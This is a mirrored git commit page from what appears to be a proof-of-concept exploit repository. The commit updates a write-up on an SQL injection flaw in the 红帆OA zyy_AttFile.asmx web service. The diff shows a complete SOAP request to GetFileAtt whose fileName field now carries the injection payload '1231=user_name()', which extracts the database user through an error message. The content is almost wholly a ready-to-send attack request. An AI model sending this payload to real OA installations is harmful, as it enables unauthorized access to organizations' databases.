mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Update 红帆OA zyy_AttFile.asmx SQL注入漏洞.md
This commit is contained in:
parent
fabbae97f8
commit
7de83d7423
@ -9,10 +9,11 @@ Content-Type: text/xml; charset=utf-8
|
|||||||
Soapaction: "http://tempuri.org/GetFileAtt"
|
Soapaction: "http://tempuri.org/GetFileAtt"
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
Connection: close
|
Connection: close
|
||||||
|
|
||||||
<?xml version="1.0" encoding="utf-8"?><soap:Envelope
|
<?xml version="1.0" encoding="utf-8"?><soap:Envelope
|
||||||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||||
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
|
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
|
||||||
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
|
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
|
||||||
xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so
|
xmlns="http://tempuri.org/"><fileName>1231=user_name()</fileName></GetFileAtt> </soap:Body></so
|
||||||
ap:Envelope>
|
ap:Envelope>
|
||||||
```
|
```
|
||||||
|
|||||||
Loading…
x
Reference in New Issue
Block a user